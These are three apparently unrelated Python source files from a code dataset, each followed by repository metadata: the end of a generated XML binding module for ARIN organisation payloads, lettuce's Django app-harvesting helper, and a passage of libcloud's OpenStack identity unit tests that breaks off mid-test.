self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='v1:', name_='comment'):
pass
def exportChildren(self, outfile, level, namespace_='v1:', name_='comment', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for line_ in self.line:
line_.export(outfile, level, namespace_, name_='line', pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='comment'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('line=[\n')
level += 1
for line_ in self.line:
showIndent(outfile, level)
outfile.write('model_.line(\n')
line_.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'line':
obj_ = line.factory()
obj_.build(child_)
self.line.append(obj_)
# end class comment
class streetAddress(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, line=None):
if line is None:
self.line = []
else:
self.line = line
def factory(*args_, **kwargs_):
if streetAddress.subclass:
return streetAddress.subclass(*args_, **kwargs_)
else:
return streetAddress(*args_, **kwargs_)
factory = staticmethod(factory)
def get_line(self): return self.line
def set_line(self, line): self.line = line
def add_line(self, value): self.line.append(value)
def insert_line(self, index, value): self.line[index] = value
def hasContent_(self):
if (
self.line
):
return True
else:
return False
def export(self, outfile, level, namespace_='v1:', name_='streetAddress', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='streetAddress')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='v1:', name_='streetAddress'):
pass
def exportChildren(self, outfile, level, namespace_='v1:', name_='streetAddress', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for line_ in self.line:
line_.export(outfile, level, namespace_, name_='line', pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='streetAddress'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('line=[\n')
level += 1
for line_ in self.line:
showIndent(outfile, level)
outfile.write('model_.line(\n')
line_.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'line':
obj_ = line.factory()
obj_.build(child_)
self.line.append(obj_)
# end class streetAddress
class line(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, number=None, valueOf_=None):
self.number = _cast(int, number)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if line.subclass:
return line.subclass(*args_, **kwargs_)
else:
return line(*args_, **kwargs_)
factory = staticmethod(factory)
def get_number(self): return self.number
def set_number(self, number): self.number = number
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='v1:', name_='line', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='line')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='v1:', name_='line'):
if self.number is not None and 'number' not in already_processed:
already_processed.add('number')
outfile.write(' number="%s"' % self.gds_format_integer(self.number, input_name='number'))
def exportChildren(self, outfile, level, namespace_='v1:', name_='line', fromsubclass_=False, pretty_print=True):
pass
def exportLiteral(self, outfile, level, name_='line'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
showIndent(outfile, level)
outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,))
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.number is not None and 'number' not in already_processed:
already_processed.add('number')
showIndent(outfile, level)
outfile.write('number=%d,\n' % (self.number,))
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('number', node)
if value is not None and 'number' not in already_processed:
already_processed.add('number')
try:
self.number = int(value)
except ValueError, exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class line
GDSClassesMapping = {
}
USAGE_TEXT = """
Usage: python <Parser>.py [ -s ] <in_xml_file>
"""
def usage():
print USAGE_TEXT
sys.exit(1)
def get_root_tag(node):
tag = Tag_pattern_.match(node.tag).groups()[-1]
rootClass = GDSClassesMapping.get(tag)
if rootClass is None:
rootClass = globals().get(tag)
return tag, rootClass
def parse(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'org'
rootClass = org
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(
sys.stdout, 0, name_=rootTag,
namespacedef_='xmlns="http://www.arin.net/regrws/core/v1"',
pretty_print=True)
return rootObj
def parseEtree(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'org'
rootClass = org
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
mapping = {}
rootElement = rootObj.to_etree(None, name_=rootTag, mapping_=mapping)
reverse_mapping = rootObj.gds_reverse_node_mapping(mapping)
content = etree_.tostring(
rootElement, pretty_print=True,
xml_declaration=True, encoding="utf-8")
sys.stdout.write(content)
sys.stdout.write('\n')
return rootObj, rootElement, mapping, reverse_mapping
def parseString(inString):
from StringIO import StringIO
doc = parsexml_(StringIO(inString))
rootNode = doc.getroot()
roots = get_root_tag(rootNode)
rootClass = roots[1]
if rootClass is None:
rootClass = org
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(
sys.stdout, 0, name_="org",
namespacedef_='xmlns="http://www.arin.net/regrws/core/v1"')
return rootObj
def parseLiteral(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'org'
rootClass = org
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
sys.stdout.write('#from OrgPayload import *\n\n')
sys.stdout.write('import OrgPayload as model_\n\n')
sys.stdout.write('rootObj = model_.rootTag(\n')
rootObj.exportLiteral(sys.stdout, 0, name_=rootTag)
sys.stdout.write(')\n')
return rootObj
def main():
args = sys.argv[1:]
if len(args) == 1:
parse(args[0])
else:
usage()
if __name__ == '__main__':
#import pdb; pdb.set_trace()
main()
__all__ = [
"comment",
"iso3166_1",
"line",
"org",
"pocLinkRef",
"pocLinks",
"streetAddress"
]
| mit | -2,681,568,108,049,449,500 | 40.330508 | 240 | 0.573003 | false |
devs1991/test_edx_docmode | venv/lib/python2.7/site-packages/lettuce/django/apps.py | 1 | 3009 | # -*- coding: utf-8 -*-
# <Lettuce - Behaviour Driven Development for python>
# Copyright (C) <2010-2012> Gabriel Falcão <gabriel@nacaolivre.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from os.path import join, dirname
try:
from importlib import import_module
except ImportError:
from django.utils.importlib import import_module
from django.apps import apps as django_apps
from django.conf import settings
def _filter_bultins(module):
"returns only those apps that are not builtin django.contrib"
name = module.__name__
return not name.startswith("django.contrib") and name != 'lettuce.django'
def _filter_configured_apps(module):
"returns only those apps that are in django.conf.settings.LETTUCE_APPS"
app_found = True
if hasattr(settings, 'LETTUCE_APPS') and isinstance(settings.LETTUCE_APPS, tuple):
app_found = False
for appname in settings.LETTUCE_APPS:
if module.__name__.startswith(appname):
app_found = True
return app_found
def _filter_configured_avoids(module):
"returns apps that are not within django.conf.settings.LETTUCE_AVOID_APPS"
run_app = False
if hasattr(settings, 'LETTUCE_AVOID_APPS') and isinstance(settings.LETTUCE_AVOID_APPS, tuple):
for appname in settings.LETTUCE_AVOID_APPS:
if module.__name__.startswith(appname):
run_app = True
return not run_app
def get_apps():
return [app_cfg.module for app_cfg in django_apps.get_app_configs()]
def harvest_lettuces(only_the_apps=None, avoid_apps=None, path="features"):
"""gets all installed apps that are not from django.contrib
returns a list of tuples with (path_to_app, app_module)
"""
apps = get_apps()
if isinstance(only_the_apps, tuple) and any(only_the_apps):
def _filter_only_specified(module):
return module.__name__ in only_the_apps
apps = filter(_filter_only_specified, apps)
else:
apps = filter(_filter_bultins, apps)
apps = filter(_filter_configured_apps, apps)
apps = filter(_filter_configured_avoids, apps)
if isinstance(avoid_apps, tuple) and any(avoid_apps):
def _filter_avoid(module):
return module.__name__ not in avoid_apps
apps = filter(_filter_avoid, apps)
joinpath = lambda app: (join(dirname(app.__file__), path), app)
return map(joinpath, apps)
| agpl-3.0 | -8,298,065,788,740,383,000 | 34.388235 | 98 | 0.691822 | false |
Scalr/libcloud | libcloud/test/common/test_openstack_identity.py | 1 | 37442 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import datetime
try:
import simplejson as json
except ImportError:
import json
from mock import Mock
from libcloud.utils.py3 import httplib
from libcloud.common.openstack import OpenStackBaseConnection
from libcloud.common.openstack_identity import AUTH_TOKEN_EXPIRES_GRACE_SECONDS
from libcloud.common.openstack_identity import get_class_for_auth_version
from libcloud.common.openstack_identity import OpenStackServiceCatalog
from libcloud.common.openstack_identity import OpenStackIdentity_2_0_Connection
from libcloud.common.openstack_identity import OpenStackIdentity_3_0_Connection
from libcloud.common.openstack_identity import OpenStackIdentity_3_0_Connection_OIDC_access_token
from libcloud.common.openstack_identity import OpenStackIdentityUser
from libcloud.compute.drivers.openstack import OpenStack_1_0_NodeDriver
from libcloud.common.openstack_identity import OpenStackIdentity_2_0_Connection_VOMS
from libcloud.test import unittest
from libcloud.test import MockHttp
from libcloud.test.secrets import OPENSTACK_PARAMS
from libcloud.test.file_fixtures import ComputeFileFixtures
from libcloud.test.compute.test_openstack import OpenStackMockHttp
from libcloud.test.compute.test_openstack import OpenStack_2_0_MockHttp
class OpenStackIdentityConnectionTestCase(unittest.TestCase):
def setUp(self):
OpenStackBaseConnection.auth_url = None
OpenStackBaseConnection.conn_class = OpenStackMockHttp
def test_auth_url_is_correctly_assembled(self):
tuples = [
('1.0', OpenStackMockHttp),
('1.1', OpenStackMockHttp),
('2.0', OpenStack_2_0_MockHttp),
('2.0_apikey', OpenStack_2_0_MockHttp),
('2.0_password', OpenStack_2_0_MockHttp)
]
APPEND = 0
NOTAPPEND = 1
auth_urls = [
('https://auth.api.example.com', APPEND, ''),
('https://auth.api.example.com/', NOTAPPEND, '/'),
('https://auth.api.example.com/foo/bar', NOTAPPEND, '/foo/bar'),
('https://auth.api.example.com/foo/bar/', NOTAPPEND, '/foo/bar/')
]
actions = {
'1.0': '/v1.0',
'1.1': '/v1.1/auth',
'2.0': '/v2.0/tokens',
'2.0_apikey': '/v2.0/tokens',
'2.0_password': '/v2.0/tokens'
}
user_id = OPENSTACK_PARAMS[0]
key = OPENSTACK_PARAMS[1]
for (auth_version, mock_http_class) in tuples:
for (url, should_append_default_path, expected_path) in auth_urls:
connection = \
self._get_mock_connection(mock_http_class=mock_http_class,
auth_url=url)
auth_url = connection.auth_url
cls = get_class_for_auth_version(auth_version=auth_version)
osa = cls(auth_url=auth_url,
user_id=user_id,
key=key,
parent_conn=connection)
try:
osa = osa.authenticate()
except:
pass
if (should_append_default_path == APPEND):
expected_path = actions[auth_version]
self.assertEqual(osa.action, expected_path)
def test_basic_authentication(self):
tuples = [
('1.0', OpenStackMockHttp),
('1.1', OpenStackMockHttp),
('2.0', OpenStack_2_0_MockHttp),
('2.0_apikey', OpenStack_2_0_MockHttp),
('2.0_password', OpenStack_2_0_MockHttp)
]
user_id = OPENSTACK_PARAMS[0]
key = OPENSTACK_PARAMS[1]
for (auth_version, mock_http_class) in tuples:
connection = \
self._get_mock_connection(mock_http_class=mock_http_class)
auth_url = connection.auth_url
cls = get_class_for_auth_version(auth_version=auth_version)
osa = cls(auth_url=auth_url, user_id=user_id, key=key,
parent_conn=connection)
self.assertEqual(osa.urls, {})
self.assertIsNone(osa.auth_token)
self.assertIsNone(osa.auth_user_info)
osa = osa.authenticate()
self.assertTrue(len(osa.urls) >= 1)
self.assertTrue(osa.auth_token is not None)
if auth_version in ['1.1', '2.0', '2.0_apikey', '2.0_password']:
self.assertTrue(osa.auth_token_expires is not None)
if auth_version in ['2.0', '2.0_apikey', '2.0_password']:
self.assertTrue(osa.auth_user_info is not None)
def test_token_expiration_and_force_reauthentication(self):
user_id = OPENSTACK_PARAMS[0]
key = OPENSTACK_PARAMS[1]
connection = self._get_mock_connection(OpenStack_2_0_MockHttp)
auth_url = connection.auth_url
yesterday = datetime.datetime.today() - datetime.timedelta(1)
tomorrow = datetime.datetime.today() + datetime.timedelta(1)
osa = OpenStackIdentity_2_0_Connection(auth_url=auth_url,
user_id=user_id,
key=key,
parent_conn=connection)
mocked_auth_method = Mock(wraps=osa._authenticate_2_0_with_body)
osa._authenticate_2_0_with_body = mocked_auth_method
# Force re-auth, expired token
osa.auth_token = None
osa.auth_token_expires = yesterday
count = 5
for i in range(0, count):
osa.authenticate(force=True)
self.assertEqual(mocked_auth_method.call_count, count)
# No force reauth, expired token
osa.auth_token = None
osa.auth_token_expires = yesterday
mocked_auth_method.call_count = 0
self.assertEqual(mocked_auth_method.call_count, 0)
for i in range(0, count):
osa.authenticate(force=False)
self.assertEqual(mocked_auth_method.call_count, 1)
# No force reauth, valid / non-expired token
osa.auth_token = None
mocked_auth_method.call_count = 0
self.assertEqual(mocked_auth_method.call_count, 0)
for i in range(0, count):
osa.authenticate(force=False)
if i == 0:
osa.auth_token_expires = tomorrow
self.assertEqual(mocked_auth_method.call_count, 1)
# No force reauth, valid / non-expired token which is about to expire in
# less than AUTH_TOKEN_EXPIRES_GRACE_SECONDS
soon = datetime.datetime.utcnow() + \
datetime.timedelta(seconds=AUTH_TOKEN_EXPIRES_GRACE_SECONDS - 1)
osa.auth_token = None
mocked_auth_method.call_count = 0
self.assertEqual(mocked_auth_method.call_count, 0)
for i in range(0, count):
if i == 0:
osa.auth_token_expires = soon
osa.authenticate(force=False)
self.assertEqual(mocked_auth_method.call_count, 1)
def _get_mock_connection(self, mock_http_class, auth_url=None):
OpenStackBaseConnection.conn_class = mock_http_class
if auth_url is None:
auth_url = "https://auth.api.example.com"
OpenStackBaseConnection.auth_url = auth_url
connection = OpenStackBaseConnection(*OPENSTACK_PARAMS)
connection._ex_force_base_url = "https://www.foo.com"
connection.driver = OpenStack_1_0_NodeDriver(*OPENSTACK_PARAMS)
return connection
class OpenStackIdentity_2_0_ConnectionTests(unittest.TestCase):
def setUp(self):
mock_cls = OpenStackIdentity_2_0_MockHttp
mock_cls.type = None
OpenStackIdentity_2_0_Connection.conn_class = mock_cls
self.auth_instance = OpenStackIdentity_2_0_Connection(auth_url='http://none',
user_id='test',
key='test',
tenant_name='test')
self.auth_instance.auth_token = 'mock'
def test_list_projects(self):
result = self.auth_instance.list_projects()
self.assertEqual(len(result), 2)
self.assertEqual(result[0].id, 'a')
self.assertEqual(result[0].name, 'test')
self.assertEqual(result[0].description, 'test project')
self.assertTrue(result[0].enabled)
class OpenStackIdentity_3_0_ConnectionTests(unittest.TestCase):
def setUp(self):
mock_cls = OpenStackIdentity_3_0_MockHttp
mock_cls.type = None
OpenStackIdentity_3_0_Connection.conn_class = mock_cls
self.auth_instance = OpenStackIdentity_3_0_Connection(auth_url='http://none',
user_id='test',
key='test',
tenant_name='test')
self.auth_instance.auth_token = 'mock'
def test_token_scope_argument(self):
# Invalid token_scope value
expected_msg = 'Invalid value for "token_scope" argument: foo'
self.assertRaisesRegexp(ValueError, expected_msg,
OpenStackIdentity_3_0_Connection,
auth_url='http://none',
user_id='test',
key='test',
token_scope='foo')
# Missing tenant_name
expected_msg = 'Must provide tenant_name and domain_name argument'
self.assertRaisesRegexp(ValueError, expected_msg,
OpenStackIdentity_3_0_Connection,
auth_url='http://none',
user_id='test',
key='test',
token_scope='project')
# Missing domain_name
expected_msg = 'Must provide domain_name argument'
self.assertRaisesRegexp(ValueError, expected_msg,
OpenStackIdentity_3_0_Connection,
auth_url='http://none',
user_id='test',
key='test',
token_scope='domain',
domain_name=None)
# Scope to project all ok
OpenStackIdentity_3_0_Connection(auth_url='http://none',
user_id='test',
key='test',
token_scope='project',
tenant_name='test',
domain_name='Default')
# Scope to domain
OpenStackIdentity_3_0_Connection(auth_url='http://none',
user_id='test',
key='test',
token_scope='domain',
tenant_name=None,
domain_name='Default')
def test_authenticate(self):
auth = OpenStackIdentity_3_0_Connection(auth_url='http://none',
user_id='test_user_id',
key='test_key',
token_scope='project',
tenant_name="test_tenant",
domain_name='test_domain')
auth.authenticate()
def test_list_supported_versions(self):
OpenStackIdentity_3_0_MockHttp.type = 'v3'
versions = self.auth_instance.list_supported_versions()
self.assertEqual(len(versions), 2)
self.assertEqual(versions[0].version, 'v2.0')
self.assertEqual(versions[0].url,
'http://192.168.18.100:5000/v2.0/')
self.assertEqual(versions[1].version, 'v3.0')
self.assertEqual(versions[1].url,
'http://192.168.18.100:5000/v3/')
def test_list_domains(self):
domains = self.auth_instance.list_domains()
self.assertEqual(len(domains), 1)
self.assertEqual(domains[0].id, 'default')
self.assertEqual(domains[0].name, 'Default')
self.assertTrue(domains[0].enabled)
def test_list_projects(self):
projects = self.auth_instance.list_projects()
self.assertEqual(len(projects), 4)
self.assertEqual(projects[0].id, 'a')
self.assertEqual(projects[0].domain_id, 'default')
self.assertTrue(projects[0].enabled)
self.assertEqual(projects[0].description, 'Test project')
def test_list_users(self):
users = self.auth_instance.list_users()
self.assertEqual(len(users), 12)
self.assertEqual(users[0].id, 'a')
self.assertEqual(users[0].domain_id, 'default')
self.assertEqual(users[0].enabled, True)
self.assertEqual(users[0].email, 'openstack-test@localhost')
def test_list_roles(self):
roles = self.auth_instance.list_roles()
self.assertEqual(len(roles), 2)
self.assertEqual(roles[1].id, 'b')
self.assertEqual(roles[1].name, 'admin')
def test_list_user_projects(self):
user = self.auth_instance.list_users()[0]
projects = self.auth_instance.list_user_projects(user=user)
self.assertEqual(len(projects), 0)
def test_list_user_domain_roles(self):
user = self.auth_instance.list_users()[0]
domain = self.auth_instance.list_domains()[0]
roles = self.auth_instance.list_user_domain_roles(domain=domain,
user=user)
self.assertEqual(len(roles), 1)
self.assertEqual(roles[0].name, 'admin')
def test_get_domain(self):
domain = self.auth_instance.get_domain(domain_id='default')
self.assertEqual(domain.name, 'Default')
def test_get_user(self):
user = self.auth_instance.get_user(user_id='a')
self.assertEqual(user.id, 'a')
self.assertEqual(user.domain_id, 'default')
self.assertEqual(user.enabled, True)
self.assertEqual(user.email, 'openstack-test@localhost')
def test_get_user_without_email(self):
user = self.auth_instance.get_user(user_id='b')
self.assertEqual(user.id, 'b')
self.assertEqual(user.name, 'userwithoutemail')
self.assertIsNone(user.email)
def test_get_user_without_enabled(self):
user = self.auth_instance.get_user(user_id='c')
self.assertEqual(user.id, 'c')
self.assertEqual(user.name, 'userwithoutenabled')
self.assertIsNone(user.enabled)
def test_create_user(self):
user = self.auth_instance.create_user(email='test2@localhost', password='test1',
name='test2', domain_id='default')
self.assertEqual(user.id, 'c')
self.assertEqual(user.name, 'test2')
def test_enable_user(self):
user = self.auth_instance.list_users()[0]
result = self.auth_instance.enable_user(user=user)
self.assertTrue(isinstance(result, OpenStackIdentityUser))
def test_disable_user(self):
user = self.auth_instance.list_users()[0]
result = self.auth_instance.disable_user(user=user)
self.assertTrue(isinstance(result, OpenStackIdentityUser))
def test_grant_domain_role_to_user(self):
domain = self.auth_instance.list_domains()[0]
role = self.auth_instance.list_roles()[0]
user = self.auth_instance.list_users()[0]
result = self.auth_instance.grant_domain_role_to_user(domain=domain,
role=role,
user=user)
self.assertTrue(result)
def test_revoke_domain_role_from_user(self):
domain = self.auth_instance.list_domains()[0]
role = self.auth_instance.list_roles()[0]
user = self.auth_instance.list_users()[0]
result = self.auth_instance.revoke_domain_role_from_user(domain=domain,
role=role,
user=user)
self.assertTrue(result)
def test_grant_project_role_to_user(self):
project = self.auth_instance.list_projects()[0]
role = self.auth_instance.list_roles()[0]
user = self.auth_instance.list_users()[0]
result = self.auth_instance.grant_project_role_to_user(project=project,
role=role,
user=user)
self.assertTrue(result)
def test_revoke_project_role_from_user(self):
project = self.auth_instance.list_projects()[0]
role = self.auth_instance.list_roles()[0]
user = self.auth_instance.list_users()[0]
result = self.auth_instance.revoke_project_role_from_user(project=project,
role=role,
user=user)
self.assertTrue(result)
class OpenStackIdentity_3_0_Connection_OIDC_access_token_federation_projectsTests(
unittest.TestCase):
def setUp(self):
mock_cls = OpenStackIdentity_3_0_federation_projects_MockHttp
mock_cls.type = None
OpenStackIdentity_3_0_Connection_OIDC_access_token.conn_class = mock_cls
self.auth_instance = OpenStackIdentity_3_0_Connection_OIDC_access_token(auth_url='http://none',
user_id='idp',
key='token',
tenant_name='oidc',
domain_name='test_domain')
self.auth_instance.auth_token = 'mock'
def test_authenticate(self):
auth = OpenStackIdentity_3_0_Connection_OIDC_access_token(auth_url='http://none',
user_id='idp',
key='token',
token_scope='project',
tenant_name="oidc",
domain_name='test_domain')
auth.authenticate()
class OpenStackIdentity_3_0_Connection_OIDC_access_tokenTests(
unittest.TestCase):
def setUp(self):
mock_cls = OpenStackIdentity_3_0_MockHttp
mock_cls.type = None
OpenStackIdentity_3_0_Connection_OIDC_access_token.conn_class = mock_cls
self.auth_instance = OpenStackIdentity_3_0_Connection_OIDC_access_token(auth_url='http://none',
user_id='idp',
key='token',
tenant_name='oidc',
domain_name='test_domain')
self.auth_instance.auth_token = 'mock'
def test_authenticate(self):
auth = OpenStackIdentity_3_0_Connection_OIDC_access_token(auth_url='http://none',
user_id='idp',
key='token',
token_scope='project',
tenant_name="oidc",
domain_name='test_domain')
auth.authenticate()
class OpenStackIdentity_2_0_Connection_VOMSTests(unittest.TestCase):
def setUp(self):
mock_cls = OpenStackIdentity_2_0_Connection_VOMSMockHttp
mock_cls.type = None
OpenStackIdentity_2_0_Connection_VOMS.conn_class = mock_cls
self.auth_instance = OpenStackIdentity_2_0_Connection_VOMS(auth_url='http://none',
user_id=None,
key='/tmp/proxy.pem',
tenant_name='VO')
self.auth_instance.auth_token = 'mock'
def test_authenticate(self):
auth = OpenStackIdentity_2_0_Connection_VOMS(auth_url='http://none',
user_id=None,
key='/tmp/proxy.pem',
token_scope='test',
tenant_name="VO")
auth.authenticate()
class OpenStackServiceCatalogTestCase(unittest.TestCase):
fixtures = ComputeFileFixtures('openstack')
def test_parsing_auth_v1_1(self):
data = self.fixtures.load('_v1_1__auth.json')
data = json.loads(data)
service_catalog = data['auth']['serviceCatalog']
catalog = OpenStackServiceCatalog(service_catalog=service_catalog,
auth_version='1.0')
entries = catalog.get_entries()
self.assertEqual(len(entries), 3)
entry = [e for e in entries if e.service_type == 'cloudFilesCDN'][0]
self.assertEqual(entry.service_type, 'cloudFilesCDN')
self.assertIsNone(entry.service_name)
self.assertEqual(len(entry.endpoints), 2)
self.assertEqual(entry.endpoints[0].region, 'ORD')
self.assertEqual(entry.endpoints[0].url,
'https://cdn2.clouddrive.com/v1/MossoCloudFS')
self.assertEqual(entry.endpoints[0].endpoint_type, 'external')
self.assertEqual(entry.endpoints[1].region, 'LON')
self.assertEqual(entry.endpoints[1].endpoint_type, 'external')
def test_parsing_auth_v2(self):
data = self.fixtures.load('_v2_0__auth.json')
data = json.loads(data)
service_catalog = data['access']['serviceCatalog']
catalog = OpenStackServiceCatalog(service_catalog=service_catalog,
auth_version='2.0')
entries = catalog.get_entries()
self.assertEqual(len(entries), 9)
entry = [e for e in entries if e.service_name == 'cloudServers'][0]
self.assertEqual(entry.service_type, 'compute')
self.assertEqual(entry.service_name, 'cloudServers')
self.assertEqual(len(entry.endpoints), 1)
self.assertIsNone(entry.endpoints[0].region)
self.assertEqual(entry.endpoints[0].url,
'https://servers.api.rackspacecloud.com/v1.0/1337')
self.assertEqual(entry.endpoints[0].endpoint_type, 'external')
def test_parsing_auth_v3(self):
data = self.fixtures.load('_v3__auth.json')
data = json.loads(data)
service_catalog = data['token']['catalog']
catalog = OpenStackServiceCatalog(service_catalog=service_catalog,
auth_version='3.x')
entries = catalog.get_entries()
self.assertEqual(len(entries), 6)
entry = [e for e in entries if e.service_type == 'volume'][0]
self.assertEqual(entry.service_type, 'volume')
self.assertIsNone(entry.service_name)
self.assertEqual(len(entry.endpoints), 3)
self.assertEqual(entry.endpoints[0].region, 'regionOne')
self.assertEqual(entry.endpoints[0].endpoint_type, 'external')
self.assertEqual(entry.endpoints[1].region, 'regionOne')
self.assertEqual(entry.endpoints[1].endpoint_type, 'admin')
self.assertEqual(entry.endpoints[2].region, 'regionOne')
self.assertEqual(entry.endpoints[2].endpoint_type, 'internal')
def test_get_public_urls(self):
data = self.fixtures.load('_v2_0__auth.json')
data = json.loads(data)
service_catalog = data['access']['serviceCatalog']
catalog = OpenStackServiceCatalog(service_catalog=service_catalog,
auth_version='2.0')
public_urls = catalog.get_public_urls(service_type='object-store')
expected_urls = ['https://storage101.lon1.clouddrive.com/v1/MossoCloudFS_11111-111111111-1111111111-1111111',
'https://storage101.ord1.clouddrive.com/v1/MossoCloudFS_11111-111111111-1111111111-1111111']
self.assertEqual(public_urls, expected_urls)
def test_get_regions(self):
data = self.fixtures.load('_v2_0__auth.json')
data = json.loads(data)
service_catalog = data['access']['serviceCatalog']
catalog = OpenStackServiceCatalog(service_catalog=service_catalog,
auth_version='2.0')
regions = catalog.get_regions(service_type='object-store')
self.assertEqual(regions, ['LON', 'ORD'])
regions = catalog.get_regions(service_type='invalid')
self.assertEqual(regions, [])
def test_get_service_types(self):
data = self.fixtures.load('_v2_0__auth.json')
data = json.loads(data)
service_catalog = data['access']['serviceCatalog']
catalog = OpenStackServiceCatalog(service_catalog=service_catalog,
auth_version='2.0')
service_types = catalog.get_service_types()
self.assertEqual(service_types, ['compute', 'image', 'network',
'object-store', 'rax:object-cdn',
'volumev2'])
service_types = catalog.get_service_types(region='ORD')
self.assertEqual(service_types, ['rax:object-cdn'])
def test_get_service_names(self):
data = self.fixtures.load('_v2_0__auth.json')
data = json.loads(data)
service_catalog = data['access']['serviceCatalog']
catalog = OpenStackServiceCatalog(service_catalog=service_catalog,
auth_version='2.0')
service_names = catalog.get_service_names()
self.assertEqual(service_names, ['cinderv2', 'cloudFiles',
'cloudFilesCDN', 'cloudServers',
